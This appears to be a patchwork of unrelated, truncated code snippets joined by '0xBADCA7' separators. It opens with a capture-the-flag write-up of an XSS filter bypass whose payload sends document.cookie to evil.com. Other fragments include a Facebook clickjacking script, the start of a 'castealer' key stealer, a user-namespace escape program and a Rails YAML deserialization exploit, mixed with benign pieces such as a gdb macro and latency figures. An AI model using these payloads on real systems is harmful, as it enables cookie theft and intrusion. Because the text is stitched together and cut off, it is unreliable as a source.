0xBADCA7

In this task we had to bypass a badly-trained anomaly detection algorithm and perform an XSS attack.

We didn't have to figure out exactly how the anomaly detection worked, but as soon as we understood that the anomaly scoring was based on the density of the "bad" (i.e. non-alphanumeric) chars in the payload. Thus, the solution was to dissolve the attack payload in a lot of benign symbols ([AxN] represents a string of N A's):

anomaly.php?name=[Ax600]%3Cvideo+[Ax300]+src=//evil.com+[Ax300]+onerror=src%2b=document.cookie+[Ax1000]+/>

0xBADCA7

#!/usr/bin/env python
# Reflects the requests from HTTP methods GET, POST, PUT, and DELETE
# Written by Nathan Hamiel (2010)

from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from optparse import OptionParser

class RequestHandler(BaseHTTPRequestHandler):
    
    def do_GET(self):

0xBADCA7

// this is for the iframe to facebook.com
document.domain = 'facebook.com'
 
uid = 501558012;
app_id = 123456789012332;
function Image(){
   // this should kill the click jacking report
}
 
// create a new iframe we will use to load facebook.com

0xBADCA7

# Original castealer.rb with analysis
#####################################################################################
 
require 'rubygems' #redundant
require 'openssl'
require 'digest/md5' #redundant
 
key = OpenSSL::PKey::RSA.new(2048)
cipher = OpenSSL::Cipher::AES.new(256, :CBC) #redundant
ctx = OpenSSL::SSL::SSLContext.new #redundant

0xBADCA7

<html lang="en">
 <head>
  <script>

function str2hex(str)
{ 
  var out_str = " ";
  
	for(var i = 0; i < str.length; i++)
	{	

0xBADCA7

##
## WPS on OpenWRT
##  This script enables Wi-Fi Protected Setup on OpenWRT.
##
##  Resources
##      http://wiki.openwrt.org/doc/uci/wireless#wps.options
##      

#Install the full wpad package
opkg update

0xBADCA7

define xac
    dont-repeat
    set $addr = (char *)($arg0)
    set $endaddr = $addr + $arg1
    while $addr < $endaddr
        printf "%p: ", $addr
        set $lineendaddr = $addr + 8
        if $lineendaddr > $endaddr
            set $lineendaddr = $endaddr
        end

0xBADCA7

Latency Comparison Numbers
--------------------------
L1 cache reference                            0.5 ns
Branch mispredict                             5   ns
L2 cache reference                            7   ns             14x L1 cache
Mutex lock/unlock                            25   ns
Main memory reference                       100   ns             20x L2 cache, 200x L1 cache
Compress 1K bytes with Zippy              3,000   ns
Send 1K bytes over 1 Gbps network        10,000   ns    0.01 ms
Read 4K randomly from SSD*              150,000   ns    0.15 ms

0xBADCA7

#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sched.h>
#include <sys/mount.h>
int main(int argc, char *argv[])
{
  if(unshare(CLONE_NEWNS | CLONE_NEWUSER) < 0) {

0xBADCA7

#you can copy this into IRB or just run it as a file

require "net/http"
require "uri"
# require "net/https" # for testing ssl

url = "http://localhost:3000/login"

yaml = %{ --- !ruby/object:Time {} }
xml = %{<?xml version="1.0" encoding="UTF-8"?><foo type="yaml">#{yaml}</foo>}.strip